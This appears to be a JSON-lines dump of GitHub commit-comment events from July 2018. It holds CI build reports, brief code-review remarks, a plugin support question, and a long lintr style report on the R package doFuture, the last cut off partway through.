{"id":"7925243725","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29612849,"position":null,"line":null,"path":null,"commit_id":"adf6b247cac54b3d78dbca5d901e96db62e04972","created_at":"2018-07-05T19:54:19Z","updated_at":"2018-07-05T19:54:19Z","author_association":"NONE","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2309 of 2309 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf6b247cac54b3d78dbca5d901e96db62e04972-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf6b247cac54b3d78dbca5d901e96db62e04972-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-05T19:54:19Z"}
{"id":"7925245618","type":"CommitCommentEvent","actor":{"login":"xinxingwang"},"repo":{"name":"xinxingwang/FirstProject"},"payload":{"comment":{"id":29612854,"position":null,"line":null,"path":null,"commit_id":"9d00b7aa55078471d6ff70e15a46697012ab0f56","created_at":"2018-07-05T19:54:44Z","updated_at":"2018-07-05T19:54:44Z","author_association":"OWNER","body":"Hi Just saw the new created file."}},"created_at":"2018-07-05T19:54:44Z"}
{"id":"7925247648","type":"CommitCommentEvent","actor":{"login":"y20k"},"repo":{"name":"y20k/transistor"},"payload":{"comment":{"id":29612857,"position":null,"line":null,"path":null,"commit_id":"83ce1f46d3b1397fa0a2073ee065dda4a4ba19dc","created_at":"2018-07-05T19:55:12Z","updated_at":"2018-07-05T19:55:12Z","author_association":"OWNER","body":"Thank you @hdmjunior !!\r\n\r\nI really appreciate the attention my little app gets from around the globe. I am always delighted to see that someone as far away from my home (Germany) is using it - and in your case also contributing to it. That is just great!\r\n\r\nAnyway. I added you to Transistor's list of [authors](https://github.com/y20k/transistor/blob/master/AUTHORS.md). Your translation will be part of the next update of the app.\r\n\r\nBest regards\r\ny20k"}},"created_at":"2018-07-05T19:55:12Z"}
{"id":"7925251495","type":"CommitCommentEvent","actor":{"login":"tooptooptoop"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29612867,"position":null,"line":null,"path":null,"commit_id":"088b799406820a3a6145744168b7e6862462202a","created_at":"2018-07-05T19:56:05Z","updated_at":"2018-07-05T19:56:05Z","author_association":"NONE","body":"Nice steps"}},"created_at":"2018-07-05T19:56:05Z"}
{"id":"7925251881","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29612869,"position":11,"line":132,"path":"Dodo.Tests/UnitLunchParametersShould.cs","commit_id":"e3052f90b435428ecf8be3587def3835155d4b21","created_at":"2018-07-05T19:56:11Z","updated_at":"2018-07-05T19:56:11Z","author_association":"MEMBER","body":"Понял, задумка хорошая, но она скорее запутывает чем помогает понять твое намерение.\r\nПустой xml на мой взгляд лучше это показывает."}},"created_at":"2018-07-05T19:56:11Z"}
{"id":"7925257566","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29612885,"position":16,"line":116,"path":"Dodo.Core.UnitTests/DomainModel/Departments/CallCenterPhoneParameterTests.cs","commit_id":"25ad6a6d519e87ac500b2537abd0633741753a8b","created_at":"2018-07-05T19:57:26Z","updated_at":"2018-07-05T19:57:26Z","author_association":"MEMBER","body":"Когда читаешь этот тест в ряду с другими, где хост в Act-е, то автоматически ищешь его там же и не находишь. И такой - блин, а в чем тут разница? А ни в чем )) \r\n"}},"created_at":"2018-07-05T19:57:26Z"}
{"id":"7925258921","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29612891,"position":5,"line":127,"path":"Dodo.Tests/UnitLunchParametersShould.cs","commit_id":"3e4dec8894bd6c98d1018acf98e1eb24925e29d4","created_at":"2018-07-05T19:57:44Z","updated_at":"2018-07-05T19:57:44Z","author_association":"MEMBER","body":"Хорошо"}},"created_at":"2018-07-05T19:57:44Z"}
{"id":"7925260514","type":"CommitCommentEvent","actor":{"login":"tkachpavlo1"},"repo":{"name":"maksGunner/test1"},"payload":{"comment":{"id":29612893,"position":null,"line":null,"path":null,"commit_id":"a3ccfbc595f98d7955adcf7a3c8cb3339940ff93","created_at":"2018-07-05T19:58:08Z","updated_at":"2018-07-05T19:58:08Z","author_association":"NONE","body":"maks"}},"created_at":"2018-07-05T19:58:08Z"}
{"id":"7925264238","type":"CommitCommentEvent","actor":{"login":"jtapia"},"repo":{"name":"jtapia/solidus_mailchimp_sync"},"payload":{"comment":{"id":29612907,"position":null,"line":null,"path":null,"commit_id":"8d0057085ee82c6cbe7f7c7fd5b36ed15a13ce5b","created_at":"2018-07-05T19:58:59Z","updated_at":"2018-07-05T19:58:59Z","author_association":"OWNER","body":"@octave yes, it should be working on v2.6"}},"created_at":"2018-07-05T19:58:59Z"}
{"id":"7925268374","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29612912,"position":128,"line":134,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"bd417b85e3efd7710a5b4bcf18bfec232c7b2e44","created_at":"2018-07-05T19:59:55Z","updated_at":"2018-07-05T19:59:55Z","author_association":"NONE","body":"init to = nullptr or you will have a nasty surprise on TEST_CASE 1"}},"created_at":"2018-07-05T19:59:55Z"}
{"id":"7920598299","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"AndyGrant/Stockfish"},"payload":{"comment":{"id":29600756,"position":null,"line":null,"path":null,"commit_id":"fcd4b0240b2da6b61035375e214a3592c6bc3f01","created_at":"2018-07-05T02:02:45Z","updated_at":"2018-07-05T02:02:45Z","author_association":"NONE","body":"For the record here is a result from 2016\r\nSTC\r\nhttp://tests.stockfishchess.org/tests/view/57efd4860ebc59763f3591aa\r\nLTC\r\nhttp://tests.stockfishchess.org/tests/view/57f0ff340ebc59763f359202\r\n"}},"created_at":"2018-07-05T02:02:45Z"}
{"id":"7920598681","type":"CommitCommentEvent","actor":{"login":"VixTips"},"repo":{"name":"VixTips/Archive"},"payload":{"comment":{"id":29600760,"position":null,"line":null,"path":null,"commit_id":"dfe2b1084deda5e37e9b4332222a961b1233223d","created_at":"2018-07-05T02:02:55Z","updated_at":"2018-07-05T02:02:55Z","author_association":"OWNER","body":"ha"}},"created_at":"2018-07-05T02:02:55Z"}
{"id":"7920601629","type":"CommitCommentEvent","actor":{"login":"nosmokingbandit"},"repo":{"name":"nosmokingbandit/Watcher3"},"payload":{"comment":{"id":29600766,"position":null,"line":null,"path":null,"commit_id":"6746cabf3610cd0e85f7731097de78f1b4d9e6c0","created_at":"2018-07-05T02:04:12Z","updated_at":"2018-07-05T02:04:12Z","author_association":"OWNER","body":"I can't even spell right in my commit messages.\r\n\r\nI give up."}},"created_at":"2018-07-05T02:04:12Z"}
{"id":"7920602066","type":"CommitCommentEvent","actor":{"login":"copumpkin"},"repo":{"name":"awsdocs/iam-user-guide"},"payload":{"comment":{"id":29600767,"position":5,"line":26,"path":"doc_source/access_policies_managed-versioning.md","commit_id":"8744a2883f6b12425a614650327fe7283422f12d","created_at":"2018-07-05T02:04:24Z","updated_at":"2018-07-05T02:04:24Z","author_association":"CONTRIBUTOR","body":"Is there an explanation for why this is floating around somewhere else in the docs? I'd love to read more about why this is an exception."}},"created_at":"2018-07-05T02:04:24Z"}
{"id":"7920602127","type":"CommitCommentEvent","actor":{"login":"softwareCobbler"},"repo":{"name":"softwareCobbler/susolv"},"payload":{"comment":{"id":29600768,"position":4,"line":13,"path":"Source.cpp","commit_id":"435e0c7c13d84fb2c9e03c2864327bb144e04e9f","created_at":"2018-07-05T02:04:26Z","updated_at":"2018-07-05T02:04:26Z","author_association":"OWNER","body":"adding a git comment? line 13-ish"}},"created_at":"2018-07-05T02:04:26Z"}
{"id":"7920602952","type":"CommitCommentEvent","actor":{"login":"softwareCobbler"},"repo":{"name":"softwareCobbler/susolv"},"payload":{"comment":{"id":29600773,"position":4,"line":13,"path":"Source.cpp","commit_id":"435e0c7c13d84fb2c9e03c2864327bb144e04e9f","created_at":"2018-07-05T02:04:50Z","updated_at":"2018-07-05T02:04:50Z","author_association":"OWNER","body":"c2"}},"created_at":"2018-07-05T02:04:50Z"}
{"id":"7920603231","type":"CommitCommentEvent","actor":{"login":"softwareCobbler"},"repo":{"name":"softwareCobbler/susolv"},"payload":{"comment":{"id":29600774,"position":7,"line":16,"path":"Source.cpp","commit_id":"435e0c7c13d84fb2c9e03c2864327bb144e04e9f","created_at":"2018-07-05T02:04:57Z","updated_at":"2018-07-05T02:04:57Z","author_association":"OWNER","body":"c3"}},"created_at":"2018-07-05T02:04:57Z"}
{"id":"7920612682","type":"CommitCommentEvent","actor":{"login":"hxqqqqqq"},"repo":{"name":"TheMagician1/redmine_backlogs"},"payload":{"comment":{"id":29600789,"position":null,"line":null,"path":null,"commit_id":"e95b3afa33b24915230a0c97d3bdb3e3dcc19268","created_at":"2018-07-05T02:09:18Z","updated_at":"2018-07-05T02:09:18Z","author_association":"NONE","body":"when i create storys or tasks to backlog,it only show 4 fields for edit. when i in taskboard to decompose tasks from one story. it only show 4~5 fileds. how to show more fileds in one popup window? because i want more fileds in one popup window when i assign a task. the fields like \"Actual begin date\",\"Actual end date\",\"Plan begin date\",\"Plan end date\" and other custom fileds.\r\n\r\ncould you help me to be done?tkx.\r\n\r\ncould i add your skype number?thx."}},"created_at":"2018-07-05T02:09:18Z"}
{"id":"7920620495","type":"CommitCommentEvent","actor":{"login":"Favna"},"repo":{"name":"Favna/Ribbon"},"payload":{"comment":{"id":29600799,"position":null,"line":null,"path":null,"commit_id":"8e1dd0c3b6fede9459273454fe16a1d2ac4e7e12","created_at":"2018-07-05T02:12:46Z","updated_at":"2018-07-05T02:12:46Z","author_association":"OWNER","body":"Thanks for spotting that. I'll change it as soon as I can."}},"created_at":"2018-07-05T02:12:46Z"}
{"id":"7920620652","type":"CommitCommentEvent","actor":{"login":"yamilgv"},"repo":{"name":"yamilgv/GarminIQInstaHiit"},"payload":{"comment":{"id":29600800,"position":null,"line":null,"path":null,"commit_id":"646eebc4e97ce5844f941852cc6e44fabd6d3d47","created_at":"2018-07-05T02:12:51Z","updated_at":"2018-07-05T02:12:51Z","author_association":"OWNER","body":"Executable Beta 0.9 Working. No bugs Known."}},"created_at":"2018-07-05T02:12:51Z"}
{"id":"7920625366","type":"CommitCommentEvent","actor":{"login":"PaulNeumann"},"repo":{"name":"PaulNeumann/vagrant-boxes"},"payload":{"comment":{"id":29600806,"position":6,"line":24,"path":"OracleDatabase/12.2.0.1/Vagrantfile","commit_id":"b86d0d2e1083a4a896935c1a7f83af9e3be3b105","created_at":"2018-07-05T02:14:58Z","updated_at":"2018-07-05T02:14:58Z","author_association":"OWNER","body":"Thank you for your comments!\r\n\r\nI'm happy to try `Time.now.gmt_offset`. For half- or quarter-hour time zones, falling back to UTC (with an appropriate note in `README.md`) seems like a viable option. Another possibility would be to reduce the scope of the enhancement by removing the offset calculation and just allowing the user to specify a time zone in the `Vagrantfile`. I'm sure there are other options that I'm not thinking of, as well.\r\n\r\nThis isn't my decision, so I'll wait for guidance before changing anything."}},"created_at":"2018-07-05T02:14:58Z"}
{"id":"7920634429","type":"CommitCommentEvent","actor":{"login":"dawangwangwang"},"repo":{"name":"dawangwangwang/dawang.github.io"},"payload":{"comment":{"id":29600821,"position":null,"line":null,"path":null,"commit_id":"29745818c01615348816990ac69b96e11d97f770","created_at":"2018-07-05T02:18:57Z","updated_at":"2018-07-05T02:18:57Z","author_association":"OWNER","body":"hhhhhhhhhhhh"}},"created_at":"2018-07-05T02:18:57Z"}
{"id":"7920636279","type":"CommitCommentEvent","actor":{"login":"dawangwangwang"},"repo":{"name":"dawangwangwang/dawang.github.io"},"payload":{"comment":{"id":29600823,"position":1,"line":1,"path":"README.md","commit_id":"29745818c01615348816990ac69b96e11d97f770","created_at":"2018-07-05T02:19:50Z","updated_at":"2018-07-05T02:19:50Z","author_association":"OWNER","body":"ooooooooooo"}},"created_at":"2018-07-05T02:19:50Z"}
{"id":"7920637129","type":"CommitCommentEvent","actor":{"login":"pantheon-upstream"},"repo":{"name":"pantheon-systems/example-drops-8-composer"},"payload":{"comment":{"id":29600825,"position":null,"line":null,"path":null,"commit_id":"2a9106132016f3b9e2f157a92f92b739959225ce","created_at":"2018-07-05T02:20:12Z","updated_at":"2018-07-05T02:20:12Z","author_association":"COLLABORATOR","body":"Created multidev environment [ci-example-d8-composer#pr-153](https://dashboard.pantheon.io/sites/c401fd14-f745-4e51-9af2-f30b45146a0c#pr-153).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-153-ci-example-d8-composer.pantheonsite.io/)"}},"created_at":"2018-07-05T02:20:12Z"}
{"id":"7920639007","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"HenrikBengtsson/doFuture"},"payload":{"comment":{"id":29600828,"position":null,"line":null,"path":null,"commit_id":"7063ab3b0e93004e8051aace4d681ab513876d44","created_at":"2018-07-05T02:21:06Z","updated_at":"2018-07-05T02:21:06Z","author_association":"NONE","body":"[inst/tests2/caret/examples.R:5:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/caret/examples.R#L5) *style:* **Lines should not be more than 80 characters.**\n```r\n​  install_missing_packages(c(\"class\", \"cluster\", \"e1071\", \"earth\", \"fastICA\", \"foreign\", \"gam\", \"klaR\", \"lattice\", \"MASS\", \"Matrix\", \"mboost\", \"mda\", \"mlbench\", \"MLmetrics\", \"nlme\", \"nnet\", \"pls\", \"proxy\", \"randomForest\", \"rpart\", \"survival\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/caret/examples.R:6:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/caret/examples.R#L6) *style:* **Lines should not be more than 80 characters.**\n```r\n​  ## install_missing_packages(c(\"ddalpha\", \"dimRed\", \"ipred\", \"ggplot2\", \"recipes\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/caret/examples.R:58:67:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/caret/examples.R#L58) *style:* **Trailing whitespace is superfluous.**\n```r\n​##   Error in e$fun(obj, substitute(ex), parent.frame(), e$data) : \n                                                                  ^\n```\n[inst/tests2/caret/examples.R:88:48:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/caret/examples.R#L88) *style:* **Trailing whitespace is superfluous.**\n```r\n​    ## Error in qda.default(x, grouping, ...) : \n                                               ^\n```\n[inst/tests2/caret/examples.R:93:5:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/caret/examples.R#L93) *style:* **Variable or function name should be snake_case.**\n```r\n​    run.dontrun <- !is.element(topic, c(\"calibration\", excl_dontrun))\n    ^~~~~~~~~~~\n```\n[inst/tests2/caret/examples.R:98:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/caret/examples.R#L98) *style:* **Lines should not be more than 80 characters.**\n```r\n​    dt <- run_example(topic = topic, package = pkg, run.dontrun = run.dontrun, local = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/glmnet/examples.R:11:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/glmnet/examples.R#L11) *style:* **Variable or function name should be snake_case.**\n```r\n​registerDoMC <- function(...) NULL\n^~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:15:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L15) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[inst/tests2/incl/utils.R:30:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L30) *style:* **Lines should not be more than 80 characters.**\n```r\n​run_example <- function(topic, package, local = FALSE, run.dontrun = TRUE, envir = globalenv()) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:30:56:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L30) *style:* **Variable or function name should be snake_case.**\n```r\n​run_example <- function(topic, package, local = FALSE, run.dontrun = TRUE, envir = globalenv()) {\n                                                       ^~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:37:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L37) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/incl/utils.R:43:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L43) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/incl/utils.R:47:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L47) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/incl/utils.R:51:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L51) *style:* **Lines should not be more than 80 characters.**\n```r\n​run_examples <- function(package, topics = test_topics(package), strategy, ...) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:57:5:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L57) *warning:* **no visible global function definition for ‘registerDoFuture’**\n```r\n​    registerDoFuture()\n    ^~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:58:5:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L58) *warning:* **no visible global function definition for ‘plan’, Did you mean 'lag'?**\n```r\n​    plan(strategy)\n    ^~~~\n```\n[inst/tests2/incl/utils.R:59:11:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L59) *warning:* **no visible global function definition for ‘run_example’**\n```r\n​    dt <- run_example(topic = topic, package = package, ...)\n          ^~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:83:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L83) *style:* **Lines should not be more than 80 characters.**\n```r\n​install_missing_packages <- function(pkgs, bioc = FALSE, repos = \"https://cloud.r-project.org\") {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:86:7:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L86) *style:* **Variable or function name should be snake_case.**\n```r\n​      .biocLite <- NULL\n      ^~~~~~~~~\n```\n[inst/tests2/incl/utils.R:90:11:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L90) *style:* **Variable or function name should be snake_case.**\n```r\n​          .biocLite <<- biocLite\n          ^~~~~~~~~\n```\n[inst/tests2/incl/utils.R:90:12:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L90) *warning:* **no visible binding for global variable ‘biocLite’**\n```r\n​          .biocLite <<- biocLite\n           ^~~~~~~~\n```\n[inst/tests2/incl/utils.R:130:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L130) *warning:* **no visible global function definition for ‘mprintf’, Did you mean 'sprintf'?**\n```r\n​  mprintf(\"Library path: %s\", paste(sQuote(.libPaths()), collapse = \", \"))\n  ^~~~~~~\n```\n[inst/tests2/incl/utils.R:133:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L133) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/incl/utils.R:137:5:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L137) *warning:* **no visible global function definition for ‘mprintf’, Did you mean 'sprintf'?**\n```r\n​    mprintf(\"- Installing package: %s\", pkg)\n    ^~~~~~~\n```\n[inst/tests2/incl/utils.R:155:5:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L155) *warning:* **no visible global function definition for ‘install_missing_packages’**\n```r\n​    install_missing_packages(\"future.BatchJobs\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:159:5:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L159) *warning:* **no visible global function definition for ‘install_missing_packages’**\n```r\n​    install_missing_packages(\"future.batchtools\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:168:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L168) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/incl/utils.R:184:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L184) *style:* **Trailing whitespace is superfluous.**\n```r\n​        \n^~~~~~~~\n```\n[inst/tests2/incl/utils.R:185:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L185) *style:* **Lines should not be more than 80 characters.**\n```r\n​        mprintf(\"- Library path: %s\", paste(sQuote(.libPaths()), collapse = \", \"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:188:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L188) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/incl/utils.R:194:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L194) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[inst/tests2/incl/utils.R:198:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/incl/utils.R#L198) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/tests2/NMF/manual.R:25:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/NMF/manual.R#L25) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/plyr/examples.R:54:5:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/plyr/examples.R#L54) *style:* **Variable or function name should be snake_case.**\n```r\n​    run.dontrun <- !is.element(topic, excl_dontrun)\n    ^~~~~~~~~~~\n```\n[inst/tests2/plyr/examples.R:55:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/plyr/examples.R#L55) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[inst/tests2/plyr/examples.R:59:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/plyr/examples.R#L59) *style:* **Lines should not be more than 80 characters.**\n```r\n​    dt <- run_example(topic = topic, package = pkg, run.dontrun = run.dontrun, local = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/plyr/examples.R:62:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/plyr/examples.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/TSP/examples.R:16:5:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/TSP/examples.R#L16) *style:* **Variable or function name should be snake_case.**\n```r\n​    run.dontrun <- !is.element(topic, c(\"Concorde\", \"solve_TSP\"))\n    ^~~~~~~~~~~\n```\n[inst/tests2/TSP/examples.R:17:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/TSP/examples.R#L17) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[inst/tests2/TSP/examples.R:24:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/inst/tests2/TSP/examples.R#L24) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/chunks.R:4:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L4) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/chunks.R:6:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L6) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/chunks.R:8:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L8) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/chunks.R:20:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/chunks.R:23:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L23) *style:* **Variable or function name should be snake_case.**\n```r\n​makeChunks <- function(nbrOfElements, nbrOfWorkers,\n^~~~~~~~~~\n```\n[R/chunks.R:23:24:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L23) *style:* **Variable or function name should be snake_case.**\n```r\n​makeChunks <- function(nbrOfElements, nbrOfWorkers,\n                       ^~~~~~~~~~~~~\n```\n[R/chunks.R:23:39:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L23) *style:* **Variable or function name should be snake_case.**\n```r\n​makeChunks <- function(nbrOfElements, nbrOfWorkers,\n                                      ^~~~~~~~~~~~\n```\n[R/chunks.R:24:24:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L24) *style:* **Variable or function name should be snake_case.**\n```r\n​                       future.scheduling = 1.0, future.chunk.size = NULL) {\n                       ^~~~~~~~~~~~~~~~~\n```\n[R/chunks.R:24:49:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/chunks.R#L24) *style:* **Variable or function name should be snake_case.**\n```r\n​                       future.scheduling = 1.0, future.chunk.size = NULL) {\n                                                